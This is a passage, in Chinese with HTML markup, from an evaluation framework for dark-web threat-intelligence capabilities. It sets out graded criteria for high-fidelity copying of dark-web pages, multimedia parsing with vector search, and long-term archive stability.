21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估将分散的原始情报转化为结构化、关联化知识体系的能力。通过量化知识图谱构建的自动化程度和关联范围，可客观反映在暗网情报分析最高阶环节的智能化水平，为复杂威胁溯源、研判和战略决策提供系统化支撑。</span></span></p><h1 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">第六章 </span></span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">暗网情报高保真复制和持久化存档能力</span></span></strong></span></h1><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网情报高保真复制和持久化存档能力是暗网威胁情报全链路能力体系中的关键支撑环节。其核心在于将采集到的原始情报以高保真方式完整保留，并实现长期安全存档，从而有效解决暗网站点频繁波动、查封或下线带来的访问难题。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Traditional Dark Web 和 Dark Web Lite 中的威胁源具有极高的不稳定性，论坛、泄露站点和群组经常因执法行动、运营商迁移或主动下线而消失。若无法对原始内容进行高保真复制和持久化存档，将会造成大量情报永久丢失，导致历史轨迹无法追溯，风险评估和事件研判缺乏完整依据。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本章从高保真复制、多媒体解析、多媒体向量检索、持久化存档稳定性以及风险控制与便利性五个维度，构建暗网情报高保真复制和持久化存档能力的量化评估体系，旨在提供稳定、安全且便捷的原始情报访问能力，支撑长期历史分析和证据保全工作。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">6.1.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">高保真复制</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">6.1.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报高保真复制</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">是持久化存档能力的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基础性核心指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，其核心设计目标在于</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评估对暗网原始内容的完整复制能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，是支撑暗网情报全流程处理、实现数据价值转化的重要基础。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网威胁源具备极强的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">不稳定性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，各类论坛页面、泄露信息站点及群组消息，常因执法管控、地址迁移或主动关停等因素出现存续中断，导致</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">原始情报数据极易丢失</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。若未能实现对原始内容的高保真复制，将造成大量核心情报</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">永久流失</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，使得威胁历史轨迹无法追溯，进而导致风险评估与事件研判工作缺乏完整的数据支撑，影响研判结果的准确性与全面性。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，该指标核心聚焦于</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">对威胁源原始内容的完整复制能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，重点考察对</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">文字信息、页面布局、附属文件、图像等各类多媒体元素</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的完整复刻能力，其能力水平直接决定暗网情报的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">原始性与可用性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为后续持久化存档、多媒体解析及历史数据回溯分析等工作，提供坚实且可靠的基础支撑，是暗网情报从原始数据向可用信息转化的核心前提。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">6.1.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据，主要结合暗网威胁源的实际特征与高保真复制的技术需求开展设定，确保指标设计的科学性、实用性与针对性，贴合暗网情报分析的实际工作需求。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报高保真复制</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">工作面临显著的技术难点，核心在于暗网威胁源具备高度的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">动态性与对抗性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：暗网网站页面结构复杂且多变，JS 动态渲染技术应用普遍，多媒体附件类型繁杂且体积差异悬殊，同时，暗网威胁源常因执法管控、运营商迁移或主动关停等因素，出现频繁的地址变更与内容删除情况。上述多重因素相互叠加，导致传统采集方式难以实现对暗网原始内容的完整、高保真复刻，无法满足后续情报分析与数据留存的核心需求。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本评估框架以高保真复制的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">完整性与覆盖范围</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">核心量化标准</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，重点评估对暗网威胁源原始内容的复制能力，涵盖</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">文字信息、页面布局、附属文件、图像等各类多媒体元素</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的完整复刻。通过设定科学合理的分级标准，客观反映在暗网高对抗环境下的复制能力水平，为后续持久化存档、多媒体解析及历史数据回溯分析等工作，提供可靠、完整的基础数据支撑，保障整个暗网情报分析工作的有序推进。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">6.1.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">高保真复制以对威胁源原始内容的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">复制完整性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="131" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="325" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="112" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="131" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">高保真复制</span></span></p></td><td data-colwidth="325" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">仅获取威胁信息或消息文本，未对原始情报进行结构化复制</span></span></p></td><td data-colwidth="112" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="325" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">对威胁源原始内容进行部分复制，主要包含文字和布局，但未完整复制多媒体元素</span></span></p></td><td data-colwidth="112" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="325" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">对威胁源原始内容进行高保真完整复制，保留文字、布局、附件、图像等多媒体元素</span></span></p></td><td data-colwidth="112" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标核心评估对暗网威胁源原始内容的复制完整性，通过量化复制的覆盖范围与保真程度，客观反映暗网原始内容的复刻能力水平，为后续多媒体解析、持久化存档及历史情报追溯等工作，提供坚实、可靠的技术支撑，确保原始情报的完整性与可用性，为后续风险研判和事件溯源提供基础数据支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">6.2.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">多媒体解析与向量检索</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">6.2.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">多媒体解析与向量检索</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">是暗网情报高保真复制和持久化存档能力的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">重要支撑指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其核心设计目的在于</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评估对非结构化多媒体内容的解析深度以及后续检索支持能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网原始情报中包含大量</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">图片、附件等非结构化多媒体元素</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，这些内容往往承载着</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">关键的威胁信息</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。如果无法对多媒体内容进行有效解析并纳入向量检索范围，则难以充分利用原始情报中的深层价值，导致情报分析的完整性和准确性受到限制。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，该指标重点考察对</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">图片、附件等多媒体内容的深度解析能力及其与向量检索</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的结合程度，直接关系到原始情报的可用性和后续分析效率，为风险评估和事件研判提供更全面的技术支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">6.2.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据，主要结合暗网原始情报的实际数据特征与实际分析需求进行设定，确保指标的实用性与针对性。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">多媒体解析与向量检索</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">在暗网情报分析中具有</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">核心支撑价值</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：通过对暗网原始情报中样例文件的深度解析，结合向量检索技术，可有效梳理暗网数据泄露的历史轨迹与跨平台传播路径，为威胁溯源、风险研判提供关键数据支撑，是连接原始数据与实用情报的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">核心环节</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">需明确的是，该技术的实现高度依赖高保真内容复制作为前置条件，</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">技术落地难度较高</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。从当前行业现状来看，全球范围内能够实现该技术能力的暗网情报相关机构，占比不足一半。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本评估框架以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">多媒体内容的解析深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，以及解析结果与向量检索的结合程度作为核心量化标准，确保该指标能够客观、真实地反映平台在高保真复制后续环节的实际支撑能力，为暗网情报的深度分析提供可靠依据。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">6.2.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">多媒体解析与向量检索</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">以对非结构化多媒体内容的解析深度及其与向量检索的结合程度作为主要量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="122" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="353" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="93" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="122" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">多媒体解析与向量检索</span></span></p></td><td data-colwidth="353" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">不提取或不处理多媒体信息，无法进行向量检索</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="353" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">仅提供多媒体原始地址链接，不进行解析，无法支持向量检索</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="353" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">利用OCR和智能格式化技术，对图片、附件等非结构化多媒体内容进行深度解析，并支持多维度向量检索</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估平台对暗网情报中非结构化多媒体内容的解析深度，以及解析结果与向量检索的结合能力。通过量化解析的完整性、检索的精准性，可客观反映平台在高保真复制后续环节的实际支撑水平，为后续知识图谱构建、威胁溯源及风险决策提供高效的技术基础，确保暗网情报的深层价值得到充分挖掘与利用。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">6.3.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">持久化存档稳定性</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">6.3.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">持久化存档稳定性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">是暗网情报高保真复制和持久化存档能力的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">重要保障性指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其核心设计目的在于</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评估平台对高保真复制后的原始情报进行长期安全存档的能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网威胁源具有极高的不稳定性，论坛页面、泄露站点和群组消息经常因</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">执法行动、地址迁移或主动下线</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">而消失。如果无法对原始情报进行</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">长期稳定的持久化存档</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，则会造成大量</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">历史情报永久丢失</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，导致无法追溯事件完整轨迹，影响后续的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">风险评估、事件研判和证据保全</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，该指标重点考察在高保真复制基础上的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">长期存档稳定性和抗风险能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，直接关系到情报的长期可用性和连续性，为历史分析和合规要求提供可靠的技术支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">6.3.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据，主要结合</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网威胁源的波动特征</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">长期存档实际需求</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">由于暗网威胁源波动频繁，一旦出现</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">地址迁移、查封或下线，原始信息尤其是多媒体内容</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">极难找回。因此，本框架以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">持久化存档的稳定性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">和</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">对原始情报源的依赖程度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化标准，重点评估在高保真复制基础上的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">长期存档效果</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span 